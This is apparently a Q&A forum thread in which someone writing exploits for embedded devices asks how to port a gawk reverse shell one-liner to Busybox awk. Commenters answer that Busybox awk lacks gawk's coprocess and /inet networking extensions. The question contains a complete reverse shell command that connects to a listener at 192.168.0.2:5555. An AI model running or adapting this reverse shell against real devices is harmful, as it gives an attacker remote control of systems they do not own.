# Can gawk reverse shell implementation be ported to work with Busybox awk?

Tags: bash, shell, awk

I'm currently into writing exploits for embedded devices. At the moment, I have found a vulnerability and discovered that the device has AWK installed on the target. Unfortunately, due to my little knowledge, Im unable to get the AWK script in the command to work

Here is the command im executing

```
busybox awk 'BEGIN{s="/inet/tcp/0/192.168.0.2/5555"; for(;s|&getline    c;close(c))while(c|getline)print|&s;close(s)}'
```

Unfortunately, no shell comes back. I then run to the local busybox, and execute it locally.. and I recieve this error using the busybox AWK.

> **Error :** awk: cmd. line:1: Unexpected token

Is there any way to fix this?

This works with GAWK but is there a way to perform a reverse tcp connection using awk on busybox, similiar to this command which works on Gawk ?

Comment: I don't think busybox awk supports the /inet/ syntax.

Comment: You tested against gawk, I'm assuming? That's massively extended over what the POSIX standard requires. Anyhow, why don't you start by describing what your code is supposed to do, so folks who know standard awk but not gawk extensions can speak to what's going on?

Comment: ...that said, if pynexj is right and you're trying to open a network socket, you simply can't do that with standard `awk` at all, and should probably start looking around at which other tools the embedded environment provides.

Comment: Ahh yeah, I was using gawk on my testing system original. :/ damnt. thanks man

Comment: Corrected the bit about GAWK and AWK.

Comment: I've also updated the title to be more descriptive of the actual question.

Comment: No. Coprocesses (`|&`) are a gawk extension and networking is another gawk extension that relies on that.

Comment: If you have found a vulnerability that you want to exploit, please, don't worry. There are robots that will add you to the database of suspicious folks :)

Comment: hahahahhaa love that